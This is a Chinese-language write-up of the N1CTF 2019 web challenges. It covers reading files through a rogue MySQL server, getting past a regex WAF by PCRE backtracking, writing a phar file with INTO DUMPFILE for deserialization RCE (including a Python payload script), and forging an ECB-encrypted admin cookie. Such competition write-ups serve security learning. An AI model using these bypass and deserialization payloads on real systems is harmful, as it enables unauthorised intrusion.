N1ctf-2019 web题解

环境

https://github.com/Nu1LCTF/n1ctf-2019

sql_manage

发现是一个mysql连接的,这类题在ddctf出现过,可以直接利用Rogue-MySql-Server达成任意文件读取
可以参考https://blog.lou00.top/index.php/archives/5/
(后话:但是有open_basedir限制只能读/tmp里的文件
扫站发现了www.zip开始阅读源码
存在waf是p牛在code-breaking出过正则回溯 参考
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html

1
2
3
if(preg_match('/sleep|BENCHMARK|processlist|GET_LOCK|information_schema|into.+?outfile|into.+?dumpfile|\/\*.*\*\//is', $query)) {
die('Go out!!!');
}

使用select xx into/*1000000个a*/dumpfile;即可绕过。
源码中给了username和password

登录后,便是Mysql Phar反序列化
https://paper.seebug.org/998/
https://xz.aliyun.com/t/2958
先根据https://blog.lou00.top/index.php/archives/43/
生成一个phar
然后上传

1
2
3
4
5
6
7
8
9
10
11
12
13
#coding=utf-8
import requests
url = "http://47.91.213.248:8001/query"
a = 'a'*1000000
data = {
"query": "select 0x123456 into/*{}*/dumpfile '/tmp/smi1e123.phar';".format(a),
"code": "nuk9"
}
cookie = {
"PHPSESSID":"ik01ngjcquttltalvf7vk6aqap"
}

print(requests.post(url=url,data=data,cookies=cookie).text)

然后在上文提到的Rogue-MySql-Server中进行修改

即可RCE

Oldattack

环境

好像只给了个zip
顺势搭了个环境
https://github.com/Lou00/ctf/tree/master/n1ctf2019/babyphoto

解题

ECB加密缺陷 参考
先注册一个用户名为aaaaaaaaaaaaaaaa的账号
再注册一个用户名为aaaaaaaaaaaaaaaaadmin的账号
分别获取auth_name

1
2
xLdZDPEzDcZ2tEiw3ukP+WlQczQU0VC7h/KQUShV/Rw= 16*a
xLdZDPEzDcZ2tEiw3ukP+XpvRpFzQ90JQCMseDgJfCo= 16*aadmin

去重拿到admin的auth_name

改掉后就拿到了第一个flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
public function userpage(Request $request,$id)
{
if($request->isMethod('get')){
if(isset($_COOKIE['auth_name'])){
$auth_check=$this->decrypt($_COOKIE['auth_name']);}else{
$auth_check=Auth::user()->name;
}
if($auth_check==='admin'){
$imgurl="";
$usern='admin';
}else{
$imgurl="";
$usern=Auth::user()->name;
}
return view('userpage')->with([
'imgurl'=>$imgurl,
'username'=>$usern,
'id'=>$id
]);
}else{
if(Auth::user()->email_verified_at){
$file=$request->file('avatar');
$data=file_get_contents('/tmp/'.$file->getFilename());
$filesize=$file->getClientSize();
if($filesize > 204800){
die("too big");
}
//waf is here.don't rce.
$file->storeAs('avatars',md5(time().Auth::user()->id).'.gif');
}else{
die('NO!');
}
}
}

这里发现进入else需要email的验证
在route/api.php里存在这个验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
/*
|--------------------------------------------------------------------------
| API Routes
|--------------------------------------------------------------------------
|
| Here is where you can register API routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| is assigned the "api" middleware group. Enjoy building your API!
|
*/

Route::get('/user/{email}', function ($email) {
DB::table('users')->where('email',$email)->update(['email_verified_at' => date('Y-m-d H:i:s',time())]);
})->where('email', '[A-Za-z0-9.@]+');

访问/api/user/{email}即可
在看到/resources/views/userpage.blade.php
<input type="hidden" name="user_session" value="@user_session($id)">
调用了下图的函数

$id为我们传入的id可控
is_file可以反序列化,达到rce